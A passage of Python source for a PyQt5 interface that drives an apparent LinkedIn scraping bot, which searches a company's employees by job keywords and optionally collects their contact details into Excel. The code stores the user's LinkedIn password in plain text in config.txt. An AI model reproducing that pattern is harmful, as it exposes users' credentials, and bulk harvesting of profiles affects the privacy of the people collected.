mixer\nimport winsound\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QThread, pyqtSignal, QObject\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.support.expected_conditions import staleness_of\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import Font, colors\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.common import exceptions\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n\nclass UiMainWindow(QtWidgets.QMainWindow):\n def __init__(self, dim):\n super().__init__()\n ####### Définition des variables utiles #############\n self.dim = dim # Récupère les dimensions de l'écran\n self.setObjectName(\"main_window\")\n width = 452\n self.setGeometry(0, 38, width, self.dim.height() - 90)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"Adentis_icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n # Icon dans le dossier de l'application\n self.setWindowIcon(icon)\n self.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.513, y1:0, x2:0.517, y2:0.511, \"\n \"stop:0 rgba(0, 158, 255, 255), stop:0.283582 rgba(255, 255, 255, 255));\")\n\n self.central_widget = QtWidgets.QWidget(self)\n self.central_widget.setObjectName(\"central_widget\")\n self.setCentralWidget(self.central_widget)\n\n ############# Définition de la grille du layout ##############\n self.gridLayout = QtWidgets.QGridLayout(self.central_widget)\n self.gridLayout.setContentsMargins(10, 35, 10, 10)\n self.gridLayout.setObjectName(\"gridLayout\")\n\n ############## statusbar ################\n self.status_bar = QtWidgets.QStatusBar(self.central_widget)\n self.status_bar.setObjectName(\"status_bar\")\n self.setStatusBar(self.status_bar)\n\n ############# menu bar #############\n menu = QtWidgets.QMenuBar(self.central_widget)\n menu.setStyleSheet(\"background-color: qlineargradient(spread:reflect, x1:0.518, y1:0, x2:0.50705, \"\n \"y2:0.517, stop:0 rgba(207, 211, 214, 255), stop:0.995025 rgba(250, 250, 250, 255));\\n \"\n \"selection-color: rgb(0, 0, 0); \\n selection-background-color: rgb(0, 170, 255);\")\n optionMenu = menu.addMenu('&Options')\n self.audioAct = QtWidgets.QAction('Audio', self.central_widget)\n self.audioAct.setCheckable(True)\n self.audioAct.setStatusTip('Emettre un son à la fin de la recherche')\n self.audioAct.setChecked(False)\n # self.audioAct.triggered.connect(self.toggleMenu)\n # exitAct = QtWidgets.QAction('Quitter',self.central_widget)\n # exitAct.setShortcut('Ctrl+Q')\n # exitAct.setStatusTip(\"Quitte l'application\")\n # exitAct.triggered.connect(app.quit)\n # optionMenu.addAction(exitAct)\n self.progress_auto_quit_Act = QtWidgets.QAction('Auto-fermeture Progression', self.central_widget)\n self.progress_auto_quit_Act.setCheckable(True)\n self.progress_auto_quit_Act.setStatusTip('Ferme la barre de progression à la fin de la recherche')\n self.progress_auto_quit_Act.setChecked(False)\n # self.progress_auto_quit_Act.triggered.connect(self.toggleMenu)\n optionMenu.addAction(self.audioAct)\n optionMenu.addAction(self.progress_auto_quit_Act)\n\n # Ajoute un menu secondaire pour les options de recherche\n recherche_option_menu = QtWidgets.QMenu('Options de Recherche', self.central_widget)\n recherche_option_menu.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.518, y1:0, x2:0.50705, \"\n \"y2:0.517, stop:0 rgba(207, 211, 214, 255), stop:0.995025 rgba(250, 250, 250, 255));\\n \"\n \"selection-color: rgb(0, 0, 0); \\n selection-background-color: rgb(0, 170, 255);\")\n\n # Ajoute un menu tertiaire pour les types de poste recherché\n recherche_option_type_poste_menu = QtWidgets.QMenu('Type de Poste', self.central_widget)\n recherche_option_type_poste_menu.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.518, y1:0, x2:0.50705, \"\n \"y2:0.517, stop:0 rgba(207, 211, 214, 255), stop:0.995025 rgba(250, 250, 250, 255));\\n \"\n \"selection-color: rgb(0, 0, 0); \\n selection-background-color: rgb(0, 170, 255);\")\n # Crée les action déterminant le type de poste\n self.recherche_type_both_Act = QtWidgets.QAction('Actuel + Auparavant', self.central_widget)\n self.recherche_type_both_Act.setCheckable(True)\n self.recherche_type_both_Act.setStatusTip(\"Recherche globale sur l'entreprise: Poste Actuel et Passé\")\n self.recherche_type_both_Act.setChecked(True)\n self.recherche_type_both_Act.setObjectName(\"Actuel+Auparavant\")\n self.recherche_type_both_Act.triggered[bool].connect(self.select_recherche_type)\n\n self.recherche_type_actuel_Act = QtWidgets.QAction('Actuel', self.central_widget)\n self.recherche_type_actuel_Act.setCheckable(True)\n self.recherche_type_actuel_Act.setStatusTip(\"Recherche contrainte sur l'entreprise: Poste Actuel uniquement\")\n self.recherche_type_actuel_Act.setChecked(False)\n self.recherche_type_actuel_Act.setObjectName(\"Actuel\")\n self.recherche_type_actuel_Act.triggered[bool].connect(self.select_recherche_type)\n\n self.recherche_type_auparavant_Act = QtWidgets.QAction('Auparavant', self.central_widget)\n self.recherche_type_auparavant_Act.setCheckable(True)\n self.recherche_type_auparavant_Act.setStatusTip(\"Recherche contrainte sur l'entreprise: Poste Passé uniquement\")\n self.recherche_type_auparavant_Act.setChecked(False)\n self.recherche_type_auparavant_Act.setObjectName(\"Auparavant\")\n self.recherche_type_auparavant_Act.triggered[bool].connect(self.select_recherche_type)\n\n # Détermine si on récupère les coordonnées dans les profils\n self.optionProfil = QtWidgets.QAction('Coordonnées', self.central_widget)\n self.optionProfil.setCheckable(True)\n self.optionProfil.setStatusTip(\"Récupérer les coordonnées disponibles sur le profil\")\n self.optionProfil.setChecked(True)\n\n # Construit l'architecture des menus\n recherche_option_menu.addAction(self.optionProfil)\n recherche_option_type_poste_menu.addAction(self.recherche_type_both_Act)\n recherche_option_type_poste_menu.addAction(self.recherche_type_actuel_Act)\n recherche_option_type_poste_menu.addAction(self.recherche_type_auparavant_Act)\n\n recherche_option_menu.addMenu(recherche_option_type_poste_menu)\n optionMenu.addMenu(recherche_option_menu)\n\n self.recherche_type = 'Actuel+Auparavant' # Valeur par défaut\n\n ############## Choix du navigateur ######################\n self.titre_navigateur = QtWidgets.QLabel(self.central_widget)\n self.titre_navigateur.setStyleSheet(\"font: 87 11pt \\\"Arial Black\\\";\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, \"\n \"x2:0.517, y2:1, stop:0 rgba(186, 230, 255, 0), \"\n \"stop:0.995025 rgba(250, 250, 250, 0));\")\n # StyleSheet background-color pour transparence\n self.titre_navigateur.setObjectName(\"titre_navigateur\")\n self.gridLayout.addWidget(self.titre_navigateur, 0, 2, 1, 1)\n\n self.combo_box = QtWidgets.QComboBox(self.central_widget)\n font = QtGui.QFont()\n font.setFamily(\"Arial Black\")\n font.setPointSize(11)\n font.setBold(True)\n font.setWeight(75)\n self.combo_box.setFont(font)\n self.combo_box.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.517413, y1:0, x2:0.512, y2:0.494, \"\n \"stop:0 rgba(192, 192, 192, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"border-color: rgb(15, 15, 15);\\n\"\n \"selection-background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0 rgba(192, 192, 192, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"selection-color: rgb(0,0,0);\")\n self.combo_box.setIconSize(QtCore.QSize(30, 30))\n self.combo_box.setObjectName(\"combo_box\")\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"firefox1600.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n # Icon dans le dossier de l'application\n self.combo_box.addItem(icon, \"\")\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(\"chrome1600.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n # Icon dans le dossier de l'application\n self.combo_box.addItem(icon1, \"\")\n\n self.navigateur = \"Firefox\" # Fixe le navigateur sur Firefox par défaut\n self.combo_box.setCurrentIndex(0)\n self.combo_box.activated[str].connect(self.nav_activated)\n # Quand combo_box activé récupère l'onglet choisit par l'intermédiaire de NavActivated\n self.combo_box.setToolTip('Choisissez le navigateur installé sur votre ordinateur')\n self.gridLayout.addWidget(self.combo_box, 1, 2, 1, 1)\n\n ################## Identification Linkedin ################\n self.titre_id_linkedin = QtWidgets.QLabel(self.central_widget)\n font = QtGui.QFont()\n font.setFamily(\"Arial Black\")\n font.setPointSize(11)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(10)\n self.titre_id_linkedin.setFont(font)\n self.titre_id_linkedin.setStyleSheet(\"font: 87 11pt \\\"Arial Black\\\";\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, \"\n \"y2:1, stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0)\"\n \");\")\n self.titre_id_linkedin.setObjectName(\"titre_id_linkedin\")\n self.gridLayout.addWidget(self.titre_id_linkedin, 0, 1, 1, 1)\n\n ## Identifiant linkedin ##\n self.identifiant = QtWidgets.QLineEdit(self.central_widget)\n\n self.identifiant.setStyleSheet(\n \"background-color: qlineargradient(spread:pad, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.134328 rgba(209, 209, 209, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"font: 12pt \\\"Arial\\\";\\n\"\n \"alternate-background-color: rgb(255, 255, 255);\")\n\n self.identifiant.setToolTip(\n \"

    Entrez votre adresse mail de connexion à Linkedin

    \")\n self.identifiant.setObjectName(\"identifiant\")\n self.identifiant.setPlaceholderText('Adresse Email')\n # Affiche un texte quand pas encore d'input dans le LineEdit\n self.gridLayout.addWidget(self.identifiant, 1, 1, 1, 1)\n\n ## Mot de passe linkedin ##\n self.password = QtWidgets.QLineEdit(self.central_widget)\n self.password.setStyleSheet(\n \"background-color: qlineargradient(spread:pad, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.134328 rgba(209, 209, 209, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"font: 12pt \\\"Arial\\\";\")\n self.password.setToolTip(\n \"

    Entrez votre mot de passe de connexion à Linkedin

    \")\n self.password.setObjectName(\"password\")\n self.password.setEchoMode(2) # EchoMode= 2 Pour afficher l'input en *****\n self.password.setPlaceholderText('Mot de passe') # Affiche un texte quand pas encore d'input dans le LineEdit\n self.gridLayout.addWidget(self.password, 2, 1, 1, 1)\n\n ################ Recherche #####################\n ##Grille secondaire pour paramètre de recherche ##\n self.gridLayout_2 = QtWidgets.QGridLayout()\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n\n self.titre_recherche = QtWidgets.QLabel(self.central_widget)\n self.titre_recherche.setStyleSheet(\"font: 87 10pt \\\"Arial Black\\\"\\n;\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, \"\n \"y2:1, stop:0 rgba(186, 230, 255, 0), \"\n \"stop:0.995025 rgba(250, 250, 250, 0));\")\n self.titre_recherche.setObjectName(\"titre_recherche\")\n self.gridLayout.addWidget(self.titre_recherche, 3, 1, 1, 1)\n\n ## Recherche nom entreprise ##\n # Titre\n self.society = QtWidgets.QLabel(self.central_widget)\n self.society.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"text-decoration: underline;\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, y2:1, \"\n \"stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0));\")\n self.society.setObjectName(\"society\")\n self.gridLayout_2.addWidget(self.society, 1, 0, 1, 2)\n # Champ\n self.societe_champ = QtWidgets.QLineEdit(self.central_widget)\n self.societe_champ.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.societe_champ.setObjectName(\"societe_champ\")\n self.societe_champ.setToolTip(\n \"

    Nom de l'entreprise recherchée

    \")\n self.gridLayout_2.addWidget(self.societe_champ, 2, 0, 1, 2)\n\n ## Recherche localisation ##\n # Titre\n self.localisation = QtWidgets.QLabel(self.central_widget)\n self.localisation.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"text-decoration: underline;\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, y2:1, \"\n \"stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0));\")\n self.localisation.setObjectName(\"localisation\")\n self.gridLayout_2.addWidget(self.localisation, 3, 0, 1, 2)\n # Champ\n self.localisation_champ = QtWidgets.QLineEdit(self.central_widget)\n self.localisation_champ.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.localisation_champ.setObjectName(\"localisation_champ\")\n self.localisation_champ.setToolTip(\n \"

    Localisation de l'entreprise ou mot clé additionnel

    \")\n self.gridLayout_2.addWidget(self.localisation_champ, 4, 0, 1, 2)\n\n ## liste des keywords pour les postes recherchés ##\n # Titre\n self.poste_keyword = QtWidgets.QLabel(self.central_widget)\n self.poste_keyword.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"background-color: rgb(255, 255, 255);\\n\"\n \"text-decoration: underline;\")\n self.poste_keyword.setObjectName(\"poste_keyword\")\n self.gridLayout_2.addWidget(self.poste_keyword, 5, 0, 1, 1)\n\n # Récupération des keywords et affichage dans un ListWidget\n self.listWidget = QListWidget(self.central_widget)\n self.listWidget.setObjectName(\"listWidget\")\n self.listWidget.setToolTip(\n \"

    Selectionnez les postes clés recherchés

    \")\n\n # Récupère liste de keywords dans fichier texte correspondant dans le dossier de l'application\n keywords = self.get_keywords('keywords-poste.txt')\n if keywords:\n for keyword in keywords:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(\n QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.Checked) # Coche par défaut tous les keywords extraits du fichier txt\n item.setText(keyword)\n self.listWidget.addItem(item) # Ajoute les keywords dans le listWidget\n self.gridLayout_2.addWidget(self.listWidget, 6, 0, 1, 1)\n\n ## liste des keywords pour les mots clés à éviter ##\n # Titre\n self.poste_antikeyword = QtWidgets.QLabel(self.central_widget)\n self.poste_antikeyword.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"background-color: rgb(255, 255, 255);\\n\"\n \"text-decoration: underline;\")\n self.poste_antikeyword.setObjectName(\"poste_antikeyword\")\n self.gridLayout_2.addWidget(self.poste_antikeyword, 5, 1, 1, 1)\n\n # Récupération des keywords et affichage dans un ListWidget\n self.listWidget2 = QListWidget(self.central_widget)\n self.listWidget2.setObjectName(\"listWidget2\")\n self.listWidget2.setToolTip(\n \"

    Selectionnez les domaines à éviter

    \")\n\n # Récupère liste de keywords à éviter dans fichier texte correspondant dans le dossier de l'application\n keywords = self.get_keywords('antikeywords-poste.txt')\n if keywords:\n for keyword in keywords:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(\n QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.Checked) # Coche par défaut tous les keywords extraits du fichier txt\n item.setText(keyword)\n self.listWidget2.addItem(item) # Ajoute les keywords dans le listWidget\n self.gridLayout_2.addWidget(self.listWidget2, 6, 1, 1, 1)\n\n # Ajoute la grille secondaire à la grille principale\n self.gridLayout.addLayout(self.gridLayout_2, 4, 1, 1, 2)\n\n ################# Chemin output ##############\n self.output_file = QtWidgets.QLineEdit(self.central_widget)\n self.output_file.setText('')\n self.output_file.setPlaceholderText('Chemin du fichier Excel') # Texte quand pas d'input\n self.gridLayout.addWidget(self.output_file, 7, 1, 1, 1)\n\n self.parcourir = QtWidgets.QPushButton(self.central_widget)\n self.parcourir.setText('Parcourir')\n self.parcourir.resize(self.parcourir.sizeHint())\n self.gridLayout.addWidget(self.parcourir, 7, 2, 1, 1)\n self.parcourir.clicked.connect(self.output) # Récupère le fichier excel d'output\n\n ############# Lancement du bot ###############\n self.lancement = QtWidgets.QPushButton(self.central_widget)\n self.lancement.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.104478 rgba(255, 255, 255, 255), stop:1 rgba(27, 192, 2, 255));\\n\"\n \"selection-background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.134328 rgba(27, 192, 2, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"font: 75 12pt \\\"MS Shell Dlg 2\\\";\")\n self.lancement.setObjectName(\"lancement\")\n self.lancement.clicked.connect(self.bot) # Lance l'application de recherche linkedin\n self.gridLayout.addWidget(self.lancement, 9, 1, 1, 1)\n\n ################## Stoppe le bot ####################\n self.stop = QtWidgets.QPushButton(self.central_widget)\n self.stop.setToolTip(\"Stoppe la recherche\")\n self.stop.setStyleSheet(\n \"selection-background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0 rgba(192, 0, 0, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0 rgba(255, 255, 255, 255), stop:1 rgba(192, 0, 0, 255));\\n\"\n \"font: 75 12pt \\\"MS Shell Dlg 2\\\";\")\n self.stop.setObjectName(\"stop\")\n self.gridLayout.addWidget(self.stop, 9, 2, 1, 1)\n self.stop.setEnabled(False)\n\n ############### logo ADENTIS #####################\n self.logo_adentis = QtWidgets.QLabel(self.central_widget)\n self.logo_adentis.setStyleSheet(\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, y2:1, \"\n \"stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0));\")\n self.logo_adentis.setText(\"\")\n self.logo_adentis.setPixmap(QtGui.QPixmap(\"Adentis_small2.png\")) # Logo dans le dossier de l'application\n self.logo_adentis.setObjectName(\"logo_adentis\")\n self.gridLayout.addWidget(self.logo_adentis, 2, 2, 2, 1, QtCore.Qt.AlignHCenter)\n\n ###### Recherche des Valeurs par défauts enregistrées############\n self.params = {'login:': \"\", 'password:': \"\", 'xlsx_path:': \"\", 'audio:': \"\", 'progress_quit:': \"\",\n 'option_profil:': \"\", 'recherche_type:': \"\"}\n self.get_params()\n\n self.retranslateUi()\n self.show()\n\n def select_recherche_type(self, statut):\n sender = self.central_widget.sender()\n if statut is True:\n self.recherche_type = sender.objectName()\n if sender.objectName() == 'Actuel':\n self.recherche_type_both_Act.setChecked(False)\n self.recherche_type_auparavant_Act.setChecked(False)\n elif sender.objectName() == 'Auparavant':\n self.recherche_type_actuel_Act.setChecked(False)\n self.recherche_type_both_Act.setChecked(False)\n elif sender.objectName() == 'Actuel+Auparavant':\n self.recherche_type_actuel_Act.setChecked(False)\n self.recherche_type_auparavant_Act.setChecked(False)\n else:\n sender.setChecked(True) # On n'autorise pas le déchochage\n self.recherche_type = sender.objectName() # le type de recherche reste sur l'objet toujours coché\n # print(self.recherche_type)\n\n def get_params(self):\n if os.path.exists(os.path.join(os.getcwd(), 'config.txt')):\n with open(os.path.join(os.getcwd(), 'config.txt'), 'r') as f:\n for line in f:\n line = line.strip()\n self.params.update({param: line[line.index(param) + len(param):] for param in self.params.keys()\n if param in line})\n\n self.identifiant.setText(self.params['login:'])\n self.password.setText(self.params['password:'])\n self.output_file.setText(self.params['xlsx_path:'])\n if self.params['audio:'] == 'True':\n self.audioAct.setChecked(True)\n else:\n self.audioAct.setChecked(False)\n if self.params['progress_quit:'] == 'True':\n self.progress_auto_quit_Act.setChecked(True)\n else:\n self.progress_auto_quit_Act.setChecked(False)\n if self.params['option_profil:'] == 'True':\n self.optionProfil.setChecked(True)\n else:\n self.optionProfil.setChecked(False)\n\n if self.params['recherche_type:'] == 'Actuel':\n self.recherche_type_actuel_Act.trigger()\n elif self.params['recherche_type:'] == 'Auparavant':\n self.recherche_type_auparavant_Act.trigger()\n elif self.params['recherche_type:'] == 'Actuel+Auparavant':\n self.recherche_type_both_Act.trigger()\n\n def nav_activated(self, text: str):\n \"\"\"\n Slot permettant de récupérer le str renvoyé par le signal de la combo_box \"Choix du navigateur\"\n et de le sauver dans navigateur\n :param text:\n \"\"\"\n self.navigateur = text\n\n def retranslateUi(self):\n self.setWindowTitle(\"Recherche Linkedin\")\n self.titre_navigateur.setText(\"Navigateur\")\n\n self.lancement.setText(\"Lancement\")\n self.titre_id_linkedin.setText(\"Identification Linkedin\")\n __sortingEnabled = self.listWidget.isSortingEnabled()\n self.listWidget.setSortingEnabled(True)\n self.listWidget.setSortingEnabled(__sortingEnabled)\n self.listWidget2.setSortingEnabled(True)\n self.listWidget2.setSortingEnabled(__sortingEnabled)\n self.society.setText(\"Société\")\n self.poste_keyword.setText(\"Poste recherché\")\n self.poste_antikeyword.setText(\"Domaine à éviter\")\n self.localisation.setText(\"Localisation\")\n\n self.stop.setText(\"STOP\")\n self.combo_box.setToolTip(\"

    Choix du navigateur

    \")\n self.combo_box.setItemText(0, \"Firefox\")\n self.combo_box.setItemText(1, \"Chrome\")\n self.titre_recherche.setText(\"Paramètres de la Recherche\")\n\n def get_keywords(self, nom_fichier: str) -> list:\n \"\"\"\n Récupère les keywords par ligne dans le fichier texte spécifié dans nom_fichier\n :param nom_fichier:\n :rtype: list\n \"\"\"\n #\n if os.path.exists(os.path.join(os.getcwd(), nom_fichier)):\n with open(os.path.join(os.getcwd(), nom_fichier), 'r') as f:\n keywords = [l.strip() for l in f]\n else:\n keywords = []\n f = open(os.path.join(os.getcwd(), nom_fichier), 'w')\n f.close()\n self.status_bar.showMessage('Fichier source des mots clés de poste introuvable')\n return keywords\n\n def get_keywords_checked(self, listobject) -> list:\n \"\"\"\n Récupère les éléments cochés dans le QlistWidget listobject\n :rtype: list\n :param listobject:\n \"\"\"\n checked_items = []\n for index in range(listobject.count()):\n if listobject.item(index).checkState() == QtCore.Qt.Checked:\n checked_items.append(listobject.item(index).text())\n return checked_items\n\n def output(self):\n \"\"\"\n Affiche une fenêtre de dialogue de recherche de fichier et met à jour self.output_file\n \"\"\"\n # Choix du fichier Excel\n fname = QtWidgets.QFileDialog.getOpenFileName(QtWidgets.QFileDialog(), 'Choisir fichier', os.getcwd(),\n \"Excel files (*.xlsx *.xls)\")\n if fname[0]:\n self.output_file.setText(fname[0])\n\n def bot(self):\n \"\"\"\n Récupère self.output_file, self.identifiant, self.password, self.societe_champ, self.localisation_champ,\n self.optionprofil, self.navigateur, et les keywords et antikeywords\n Paramètres minimums :\n self.output_file.text() existe et est un fichier xls\n self.identifiant.text() est rempli\n self.password.text() est rempli\n self.societe_champ.text() est rempli\n Au moins un des keywords de self.listWidget est coché\n Appelle la classe Progression\n Appelle la classe TableTpsReel\n Appelle la classe Bot\n Met en place les connection entre les signaux provenant de Bot et les slot de mise à jour de Progression et\n des différent boutons de l'interface\n \"\"\"\n if os.path.isfile(self.output_file.text()) and 'xls' in os.path.splitext(self.output_file.text())[1] and len(\n self.identifiant.text()) > 0 and len(self.password.text()) > 0 and \\\n len(self.get_keywords_checked(self.listWidget)) > 0:\n\n # Sauve l'identifiant, le mot de passe et le chemin du fichier excel dans le fichier config.txt\n self.save_params()\n\n self.recherche = Bot(self.identifiant.text(), self.password.text(), self.societe_champ.text(),\n self.localisation_champ.text(), self.optionProfil.isChecked(),\n self.recherche_type, self.output_file.text(),\n self.get_keywords_checked(self.listWidget),\n self.get_keywords_checked(self.listWidget2),\n self.navigateur)\n self.progress = Progression(self.dim)\n try:\n self.table = TableTpsReel(self.output_file.text())\n except ValueError:\n self.progress.update_statut_recherche('Le Fichier Excel n\"est pas correctement formaté, Renseigner '\n 'au moins le nom des colonnes dans la première ligne')\n self.done()\n return\n\n # Signaux de mise à jour du label statut_recherche avec les message provenant de Bot et TableTpsReel\n self.recherche.c.update_statut_recherche[str].connect(self.progress.update_statut_recherche)\n self.table.update_statut_recherche[str].connect(self.progress.update_statut_recherche)\n # Signaux de mise à jour du label statut_page avec les message provenant de Bot\n self.recherche.c.update_statut_page[str].connect(self.progress.update_statut_page)\n self.recherche.c.add_page.connect(self.progress.addpage)\n # Signaux de mise à jour des paramètres de la barre de progression en fonction des infos tirées de Bot\n self.recherche.c.get_max[int].connect(self.progress.set_max)\n self.recherche.c.update_pbar.connect(self.progress.addstep)\n # Signaux de mise à jour de TableTpsReel à partir des infos tirées de Bot\n self.recherche.c.update_table[dict].connect(self.table.remplissage_table)\n # Mets à jour les messages et les états des boutons de l'interface quand Bot est terminé\n self.recherche.finished.connect(self.done)\n # Signaux d'arret de la recherche\n self.stop.clicked.connect(self.stop_recherche)\n self.progress.btn_pause.clicked[bool].connect(self.setpause)\n self.status_bar.showMessage('Recherche en cours')\n # Lance le thread de Bot\n self.recherche.start()\n # Une fois Bot lancé, rend le bouton stop accessible et le bouton lancement inaccessible\n self.stop.setEnabled(True)\n self.lancement.setEnabled(False)\n else:\n self.status_bar.showMessage('Certaines informations requises sont manquantes')\n\n def save_params(self):\n # Mets à jour le dictionnaire avec les données rentrées par l'utilisateur\n self.params['login:'] = self.identifiant.text()\n self.params['password:'] = self.password.text()\n self.params['xlsx_path:'] = self.output_file.text()\n\n if self.audioAct.isChecked():\n self.params['audio:'] = 'True'\n else:\n self.params['audio:'] = 'False'\n\n if self.progress_auto_quit_Act.isChecked():\n self.params['progress_quit:'] = 'True'\n else:\n self.params['progress_quit:'] = 'False'\n\n if self.optionProfil.isChecked():\n self.params['option_profil:'] = 'True'\n else:\n self.params['option_profil:'] = 'False'\n\n self.params['recherche_type:'] = self.recherche_type\n\n if os.path.exists(os.path.join(os.getcwd(), 'config.txt')):\n with open(os.path.join(os.getcwd(), 'config.txt'), 'w') as fw:\n for param in self.params.keys():\n fw.write('{}{}\\n'.format(param, self.params[param]))\n\n def stop_recherche(self):\n self.recherche.continueflag = False\n self.stop.setEnabled(False)\n\n def setpause(self, pressed):\n if pressed:\n self.progress.btn_pause.setIcon(QtGui.QIcon('playbuttonb.png'))\n self.progress.btn_pause.setIconSize(QtCore.QSize(45, 45))\n self.recherche.pauseflag = True\n else:\n self.progress.btn_pause.setIcon(QtGui.QIcon('pausebutton.png'))\n self.progress.btn_pause.setIconSize(QtCore.QSize(45, 45))\n self.recherche.pauseflag = False\n\n def done(self):\n \"\"\"\n Show the message that fetching posts is done.\n Disable Stop button, enable the Start one and reset progress bar to 0\n \"\"\"\n self.stop.setEnabled(False)\n self.lancement.setEnabled(True)\n self.progress.pbar.setValue(0)\n self.status_bar.showMessage('Recherche terminée')\n if self.progress_auto_quit_Act.isChecked():\n self.progress.close()\n if self.audioAct.isChecked():\n sound = glob(os.path.join(os.getcwd(), '*.mp3'))\n if len(sound) > 0 and os.path.isfile(sound[0]):\n mixer.init()\n mixer.music.load(sound[0])\n mixer.music.play()\n else:\n winsound.Beep()\n\n def closeEvent(self, e):\n if hasattr(self, 'recherche'):\n self.stop.clicked.connect(self.stop_recherche)\n while self.recherche.isFinished() is False:\n time.sleep(1)\n if hasattr(self, 'table'):\n self.table.close()\n if hasattr(self, 'progress'):\n self.progress.close()\n e.accept()\n\n\nclass QListWidget(QtWidgets.QListWidget):\n def contextMenuEvent(self, e):\n cmenu = QtWidgets.QMenu(self)\n cmenu.setStyleSheet(\"background-color: rgb(255, 255, 255);\\n\"\n \"selection-background-color : rgb(0,0,255);\")\n newAct = cmenu.addAction('Nouveau Mot clé')\n delAct = cmenu.addAction('Supprimer mot clé')\n action = cmenu.exec_(self.mapToGlobal(e.pos()))\n\n if self.objectName() == 'listWidget':\n nomfichier = 'keywords-poste.txt'\n elif self.objectName() == 'listWidget2':\n nomfichier = 'antikeywords-poste.txt'\n\n # Définit un context menu pour les list widget\n if action == newAct:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(\n QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.Checked)\n keyword, ok = QtWidgets.QInputDialog.getText(self, 'Nouveau mot clé', 'Mot clé')\n if ok:\n item.setText(keyword)\n self.addItem(item)\n if os.path.exists(os.path.join(os.getcwd(), nomfichier)):\n with open(os.path.join(os.getcwd(), nomfichier), 'a') as f:\n f.write('\\n{}'.format(keyword))\n\n elif action == delAct:\n listItems = self.selectedItems()\n if listItems:\n for item in listItems:\n self.takeItem(self.row(item))\n keyword = item.text()\n if len(keyword) > 0:\n noms_a_effacer = keyword.encode('utf-8')\n with open(nomfichier, 'rb') as f:\n with open(nomfichier, 'r+b') as g:\n ch = f.read()\n x = ch.find(noms_a_effacer)\n x = ch[0:x].rfind(b'\\n') + 1\n f.seek(x)\n g.seek(x)\n [g.write(ln) for ln in f if noms_a_effacer not in ln]\n g.truncate()\n\n\n############### Classe Interface Barre de progression #####################\nclass Progression(QtWidgets.QWidget):\n \"\"\"\n Definit une fenetre avec deux lignes :\n un label statut_recherche\n un label statut_page\n et une barre de progression\n \"\"\"\n\n def __init__(self, dim):\n super().__init__()\n width = 1300\n height = 160\n self.setGeometry(455,\n dim.height() - (height + 50), width, height)\n self.setWindowTitle('Recherche...')\n icon = QtGui.QIcon()\n # Icon dans le dossier de l'application\n icon.addPixmap(QtGui.QPixmap(\"Adentis_icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n\n grid = QtWidgets.QGridLayout()\n grid.setSpacing(10)\n self.setLayout(grid)\n\n # Statut de la recherche\n self.statut_recherche = 